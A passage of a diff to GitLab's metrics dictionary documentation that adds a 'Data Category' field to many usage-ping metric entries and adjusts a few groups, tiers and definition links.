done on a wiki (create, edit, delete) Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14934,6 +17598,8 @@ Monthly active users of GitLab Managed Terraform states Group: `group::configure` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14946,6 +17612,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -14958,6 +17626,8 @@ Count of unique users per week|month who visit the full code quality report Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14970,6 +17640,8 @@ Count of unique users per week who visit the full code quality report Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14982,6 +17654,8 @@ Aggregated count of unique users who have clicked from group code coverage page Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14994,6 +17668,8 @@ Aggregated count of unique users who have clicked from group code coverage page Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15006,6 +17682,8 @@ Count of unique users per month who visited the group code coverage page Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15018,6 +17696,8 @@ Count of unique users per week who visited the group code coverage page Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15030,6 +17710,8 @@ Count of unique users per month who expanded the load performance report MR widg Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15042,6 +17724,8 @@ Count of unique users per week who expanded the load performance report MR widge Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15054,6 +17738,8 @@ Tracks number of metrics reports uploaded monthly. Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15066,6 +17752,8 @@ Count of unique users per week who trigger a pipeline that uploads a metrics rep Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15078,6 +17766,8 @@ Count of unique users per month who expanded the metrics report MR widget Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15090,6 +17780,8 @@ Count of unique users per week who expanded the metrics report MR widget Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15102,6 +17794,8 @@ Unique users that expand the test summary merge request widget by month Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15114,6 +17808,8 @@ Unique users that expand the test summary merge request widget by week Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15126,6 +17822,8 @@ Internal Tracking to count number of unit tests parsed for planning of future co Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15138,6 +17836,8 @@ Internal Tracking to count number of unit tests parsed for planning of future co Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15150,6 +17850,8 @@ Count of unique users per month who expanded the browser performance report MR w Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15162,6 +17864,8 @@ Count of unique users per week who expanded the browser performance report MR wi Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15174,6 +17878,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `removed` Tiers: `free` @@ -15186,6 +17892,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `removed` Tiers: `premium`, `ultimate` @@ -15198,6 +17906,8 @@ Count of expanding the accessibility report widget Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15210,6 +17920,8 @@ Count of expanding the accessibility report widget Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15222,6 +17934,8 @@ Count of expanding the code quality widget Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15234,6 +17948,8 @@ Count of expanding the code quality widget Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15246,6 +17962,8 @@ A monthly count of users that have published a Composer package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15258,6 +17976,8 @@ A weekly count of users that have published a Composer package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15270,6 +17990,8 @@ A monthly count of users that have published a Conan package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15282,6 +18004,8 @@ A weekly count of users that have published a Conan package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15294,6 +18018,8 @@ A monthly count of users that have published a container image to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15306,6 +18032,8 @@ A weekly count of users that have published a container image to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15318,6 +18046,8 @@ A monthly count of users that have published a Debian package to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15330,6 +18060,8 @@ A weekly count of users that have published a Debian package to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15342,6 +18074,8 @@ A monthly count of users that have published a generic package to the registry Group: `group::package` +Data Category: `Optional` + Status: `broken` Tiers: `free`, `premium`, `ultimate` @@ -15354,6 +18088,8 @@ A weekly count of users that have published a generic package to the registry Group: `group::package` +Data Category: `Optional` + Status: `broken` Tiers: `free`, `premium`, `ultimate` @@ -15366,6 +18102,8 @@ A monthly count of users that have published a Go moduleto the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15378,6 +18116,8 @@ A weekly count of users that have published a Go module to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15390,6 +18130,8 @@ Distinct user count events for Helm packages in recent 28 days Group: `group::package` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -15402,6 +18144,8 @@ Distinct user count events for Helm packages in recent 7 days Group: `group::package` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -15414,6 +18158,8 @@ A monthly count of users that have published a Maven package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15426,6 +18172,8 @@ A weekly count of users that have published a Maven package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15438,6 +18186,8 @@ A monthly count of users that have published an npm package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15450,6 +18200,8 @@ A weekly count of users that have published an npm package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15462,6 +18214,8 @@ A monthly count of users that have published a NuGet package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15474,6 +18228,8 @@ A weekly count of users that have published a NuGet package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15486,6 +18242,8 @@ A monthly count of users that have published a PyPI package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15498,6 +18256,8 @@ A weekly count of users that have published a Python package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15510,6 +18270,8 @@ Distinct user count of RubyGems packages published in recent 28 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15522,6 +18284,8 @@ A weekly count of distinct RubyGems packages published by a user Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15534,6 +18298,8 @@ A monthly count of users that have published a package tag to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15546,6 +18312,8 @@ A weekly count of users that have published a package with a tag to the registry Group: `group::package` +Data Category: `Optional` + Status: `deprecated` Tiers: `free`, `premium`, `ultimate` @@ -15558,6 +18326,8 @@ Number of distinct users creating Terraform Module packages in recent 28 days Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15570,6 +18340,8 @@ Number of distinct users creating Terraform Module packages in recent 7 days Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15582,6 +18354,8 @@ A monthly count of users that have published a package to the registry Group: `group::package` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15594,6 +18368,8 @@ A weekly count of users that have published a package to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15606,6 +18382,8 @@ Whether incoming email is setup Group: `group::certify` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15618,6 +18396,8 @@ Calculated unique users to perform Advanced searches by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15630,6 +18410,8 @@ Calculated unique users to perform a search with a paid license enabled by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15642,6 +18424,8 @@ Calculated unique users to perform Basic or Advanced searches by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15654,6 +18438,8 @@ Total unique users for i_search_total, i_search_advanced, i_search_paid for rece Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15666,10 +18452,28 @@ Total unique users for i_search_total, i_search_advanced, i_search_paid for rece Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `settings.collected_data_categories` + +List of collected data categories corresponding to instance settings + +[Object JSON schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/objects_schemas/collected_data_categories_schema.json) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210702140138_collected_data_categories.yml) + +Group: `group::product intelligence` + +Data Category: `Standard` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + ### `settings.gitaly_apdex` Gitaly application performance @@ -15678,6 +18482,8 @@ Gitaly application performance Group: `group::gitaly` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15690,6 +18496,8 @@ Is encrypted LDAP secrets configured? Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15702,6 +18510,8 @@ Information about the operating system running GitLab Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15714,6 +18524,8 @@ Whether public signup is enabled Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15728,6 +18540,8 @@ Topology data Group: `group::memory` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15740,6 +18554,8 @@ Total GitLab Managed clusters with GitLab Managed App:Cert Manager installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15752,6 +18568,8 @@ Total GitLab Managed clusters with GitLab Managed App:Helm enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15764,6 +18582,8 @@ Total GitLab Managed clusters with GitLab Managed App:Ingress installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15776,6 +18596,8 @@ Total GitLab Managed clusters with GitLab Managed App:Knative installed Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15788,6 +18610,8 @@ Total GitLab Managed disabled clusters Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15800,6 +18624,8 @@ Total GitLab Managed clusters currently enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15812,6 +18638,8 @@ Total GitLab Managed clusters with defined cluster management project Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15824,6 +18652,8 @@ Total GitLab Managed clusters provisioned with GitLab on AWS EKS Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15836,6 +18666,8 @@ Total GitLab Managed clusters provisioned with GitLab on GCE GKE Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15848,6 +18680,8 @@ Total GitLab Managed clusters that are user provisioned Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15860,6 +18694,8 @@ Total GitLab Managed disabled clusters attached to groups Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15872,6 +18708,8 @@ Total GitLab Managed enabled clusters attached to groups Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15884,6 +18722,8 @@ Total GitLab Managed disabled clusters attached to the instance Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15896,6 +18736,8 @@ Total GitLab Managed enabled clusters attached to the instance Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15908,6 +18750,8 @@ Total GitLab Managed disabled clusters attached to projects Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15920,6 +18764,8 @@ Total GitLab Managed enabled clusters attached to projects Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -15932,6 +18778,8 @@ Unique projects with Slack webhook enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -15944,6 +18792,8 @@ Unique projects with Slack ‘/’ commands enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -15956,6 +18806,8 @@ Projects with Prometheus alerting enabled Group: `group::configure` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -15968,6 +18820,8 @@ Total number of project approval rules Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15980,6 +18834,8 @@ Number of approval rules with the exact number of required approvers. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -15992,6 +18848,8 @@ Number of approval rules with fewer approvers than required. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16004,6 +18862,8 @@ Number of approval rules with more approvers than required. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16016,6 +18876,8 @@ Number of project approval rules scoped to a specific repo branch. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16028,6 +18890,8 @@ Count of users creating deploy keys. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16040,6 +18904,8 @@ Count of users creating regular keys. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16052,6 +18918,8 @@ Count of the number of users creating merge requests Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16064,6 +18932,8 @@ Merge requests with added rules Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16076,6 +18946,8 @@ Count of merge requests with optional codeowner approval rules Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16088,6 +18960,8 @@ Number of merge requests that have overridden rules created at the project level Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16100,6 +18974,8 @@ Count of merge requests with required codeowner approval rules Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16112,6 +18988,8 @@ Count of users creating projects that require approval by code owners for code c Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16124,6 +19002,8 @@ Missing description Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16136,6 +19016,8 @@ Total count of projects that do not allow overriding approvers on discrete merge Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16148,6 +19030,8 @@ Count of projects that have a matching Git repository, result of a Git push acti Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16160,6 +19044,8 @@ Count of projects using code owners with code owners section feature Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16172,6 +19058,8 @@ Count of total projects that do not disable overriding approvers per discrete me Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16184,6 +19072,8 @@ Count of users creating projects with repositories making use of at least one pr Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16196,6 +19086,8 @@ Count of users creating projects with remote mirrors. Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16208,6 +19100,8 @@ Count of distinct author_id from snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16220,6 +19114,8 @@ Count of unique users who create suggestions in merge request comments Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16232,6 +19128,8 @@ The total number of files which have been locked via the GitLab UI Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16244,6 +19142,8 @@ Number of paths/directories manually locked through the UI Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16256,6 +19156,8 @@ Number of unique users who have locked files or directories using LFS via the co Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16268,6 +19170,8 @@ Number of users who have manually locked paths/directories through the UI Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16280,6 +19184,8 @@ Number of Git fetch events from Prometheus on the Geo secondary Group: `group::geo` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16292,6 +19198,8 @@ Number of Git push events from Prometheus on the Geo secondary Group: `group::geo` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16304,6 +19212,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16316,6 +19226,8 @@ Distinct count of users that triggered an import using the Group Migration tool Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16328,10 +19240,26 @@ Count of imports using GitLab Migration Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage.manage.compliance_frameworks_with_pipeline` + +Count of compliance frameworks that have a pipeline configuration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210622123800_compliance_frameworks_with_pipeline.yml) + +Group: `compliance` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + ### `usage_activity_by_stage.manage.custom_compliance_frameworks` Total count of all custom compliance framework labels @@ -16340,6 +19268,8 @@ Total count of all custom compliance framework labels Group: `compliance` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16352,6 +19282,8 @@ Missing description Group: `group::manage` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16364,6 +19296,8 @@ Count of groups imported using GitLab Migration Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16376,6 +19310,8 @@ Count of group imports using Group Import/Export Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16388,6 +19324,8 @@ Has the instance enabled Group SAML SSO `https://docs.gitlab.com/ee/user/group/s Group: `group::manage` +Data Category: `Optional` + Status: `data_available` Tiers: `premium` @@ -16400,6 +19338,8 @@ Number of users who are group members. Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16412,6 +19352,8 @@ Distinct count of users that imported groups using Group Import Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16424,6 +19366,8 @@ Count of (attempted) imports from csv files Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16436,6 +19380,8 @@ Count of projects imported from fogbugz Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16448,6 +19394,8 @@ Count of projects imported from Jira Group: `group::import` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -16460,6 +19408,8 @@ Count of projects imported from phabricator Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16472,6 +19422,8 @@ Distinct count of users that imported issues into projects using CSV upload Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16484,6 +19436,8 @@ Distinct count of users that imported issues into projects using FogBugz Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16496,6 +19450,8 @@ Distinct count of users that imported issues into projects using Jira Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16508,6 +19464,8 @@ Distinct count of users that imported issues into projects using Phabricator Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16520,6 +19478,8 @@ Has the instance configured [LDAP Admin Sync](https://docs.gitlab.com/ee/adminis Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16532,6 +19492,8 @@ Has the instance configured [LDAP Group Sync](https://docs.gitlab.com/ee/adminis Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16544,6 +19506,8 @@ Number of users creating keys synced as part of LDAP Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16556,6 +19520,8 @@ Number of [LDAP servers configured for the instance](https://docs.gitlab.com/ee/ Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16568,6 +19534,8 @@ Number of users that are linked to LDAP Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16580,6 +19548,8 @@ Number of unique user logins using an OmniAuth provider Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16592,6 +19562,8 @@ Count of projects imported from Bitbucket Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16604,6 +19576,8 @@ Count of projects imported from Bitbucket Server Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16616,6 +19590,8 @@ Count of projects imported by URL Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16628,6 +19604,8 @@ Count of projects imported from Gitea Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16640,6 +19618,8 @@ Count of projects imported from GitHub Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16652,6 +19632,8 @@ Count of projects imported from GitLab.com Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16664,6 +19646,8 @@ Count of projects imported using GitLab Migration Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16676,6 +19660,8 @@ Count of projects imported using Project Import/Export Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16688,6 +19674,8 @@ Count of projects imported using manifst file Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16700,6 +19688,8 @@ Count number of projects imported monthly Group: `group::import` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -16712,6 +19702,8 @@ Distinct count of users that imported projects from Bitbucket Cloud Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16724,6 +19716,8 @@ Distinct count of users that imported projects from Bitbucket Server Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16736,6 +19730,8 @@ Distinct count of users that imported projects using Import by URL Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16748,6 +19744,8 @@ Distinct count of users that imported projects from Gitea Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16760,6 +19758,8 @@ Distinct count of users that imported projects from GitHub Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16772,6 +19772,8 @@ Distinct count of users that imported projects from GitLab.com Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16784,6 +19786,8 @@ Distinct count of users that imported projects using Project Import/Export Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16796,6 +19800,8 @@ Distinct count of users that imported projects using Manifest file Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16808,6 +19814,8 @@ Total count of all projects imported with import_source NOT NULL Group: `group::import` +Data Category: `Optional` + Status: `deprecated` Tiers: `free` @@ -16820,6 +19828,8 @@ Number of projects labeled with a compliance framework label [see](https://gitla Group: `group::manage` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -16832,6 +19842,8 @@ Distinct count of users that triggered any kind of import Group: `group::import` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -16844,6 +19856,8 @@ Number of unique user logins using Google OAuth authentication Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16856,6 +19870,8 @@ Number of unique user logins using password authentication Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16868,6 +19884,8 @@ Number of unique user logins using two factor authentication Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16880,6 +19898,8 @@ Number of unique user logins using two factor via a U2F device Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16892,6 +19912,8 @@ Number of unique user logins using two factor via a WebAuthn device Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16904,6 +19926,8 @@ Number of users Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16916,6 +19940,8 @@ Number of custom value stream analytics stages. Group: `group::optimize` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -16928,6 +19954,8 @@ Users creating clusters. Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16940,6 +19968,8 @@ Users creating clusters with Prometheus enabled. Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16952,6 +19982,8 @@ Active users with enabled operations dashboard Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium` @@ -16964,6 +19996,8 @@ Active users with projects on operations dashboard Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -16972,13 +20006,15 @@ Tiers: `free`, `premium`, `ultimate` Projects where Incident SLA is enabled -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180522_projects_incident_sla_enabled.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180522_projects_incident_sla_enabled.yml) + +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `usage_activity_by_stage.monitor.projects_with_alert_incidents` @@ -16986,11 +20022,13 @@ Count of unique projects with an incident from an alert [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180520_projects_with_alert_incidents.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `usage_activity_by_stage.monitor.projects_with_enabled_alert_integrations_histogram` @@ -17002,6 +20040,8 @@ Histogram (buckets 1 to 100) of projects with at least 1 enabled integration. Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -17012,11 +20052,13 @@ Projects where error tracking is enabled [YAML 